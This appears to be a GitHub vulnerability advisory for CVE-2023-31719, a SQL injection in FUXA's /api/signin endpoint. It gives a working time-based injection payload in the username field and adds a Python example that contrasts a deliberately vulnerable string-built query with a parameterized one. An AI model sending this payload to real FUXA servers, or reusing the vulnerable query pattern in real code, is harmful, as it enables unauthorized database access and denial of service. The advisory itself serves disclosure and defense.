CVE-2023-31719: GitHub - MateusTesser/CVE-2023-31719
FUXA <= 1.1.12 is vulnerable to SQL Injection via /api/signin.
CVE-2023-31719
It is possible to inject SQL code into the JSON parameter “username” of the /api/signin endpoint via an HTTP POST request:
{"username":"test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj","password":"test"}
Affected product: FUXA
Version affected: <= 1.1.12
Problem: SQL Injection
Description: It is possible to inject SQL code into the JSON parameter “username” of the /api/signin endpoint via an HTTP POST request.
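The following is an added example, not code from this repository or from FUXA. It contrasts a string-built user lookup with a bound-parameter lookup, and uses SQLite's authorizer hook to show that the advisory's username value is compiled as SQL only in the string-built form. The `users` schema, the query text and all function names are assumptions. An in-memory SQLite database is used because the payload calls SQLite functions.

```python
import sqlite3

SQLITE_FUNCTION = getattr(sqlite3, "SQLITE_FUNCTION", 31)  # authorizer action code

# The username value from the advisory's request body.
ADVISORY_USERNAME = ("test' OR 2891=LIKE(CHAR(65,66,67,68,69,70,71),"
                     "UPPER(HEX(RANDOMBLOB(500000000/2))))-- ZJMj")
BOUND_SQL = "SELECT username FROM users WHERE username = ?"

def make_db():
    """Constructed in-memory users table (schema is an assumption, not FUXA's)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "constructed-hash"), ("o'brien", "constructed-hash")])
    return db

def build_query_concat(username):
    """Vulnerable pattern: the username becomes part of the SQL text."""
    return "SELECT username FROM users WHERE username = '" + username + "'"

def lookup_concat(db, username):
    return db.execute(build_query_concat(username)).fetchall()

def lookup_bound(db, username):
    """Hardened pattern: the username is bound as data and never parsed as SQL."""
    return db.execute(BOUND_SQL, (username,)).fetchall()

def sql_functions_compiled(db, sql, params=()):
    """Return the SQL functions SQLite resolves while compiling `sql`.
    EXPLAIN only lists the statement's bytecode, so the payload's
    RANDOMBLOB expression is compiled but never evaluated."""
    seen = set()
    def authorizer(action, arg1, arg2, dbname, source):
        if action == SQLITE_FUNCTION:
            seen.add(arg2.lower())
        return sqlite3.SQLITE_OK
    db.set_authorizer(authorizer)
    db.execute("EXPLAIN " + sql, params).fetchall()
    return seen

if __name__ == "__main__":
    db = make_db()
    print(sql_functions_compiled(db, build_query_concat(ADVISORY_USERNAME)))
    print(sql_functions_compiled(db, BOUND_SQL, (ADVISORY_USERNAME,)))
    print(lookup_bound(db, ADVISORY_USERNAME))
```

A username containing a single quote, such as the constructed `o'brien` row, makes a useful regression test: the string-built lookup fails with a syntax error while the bound lookup returns the row.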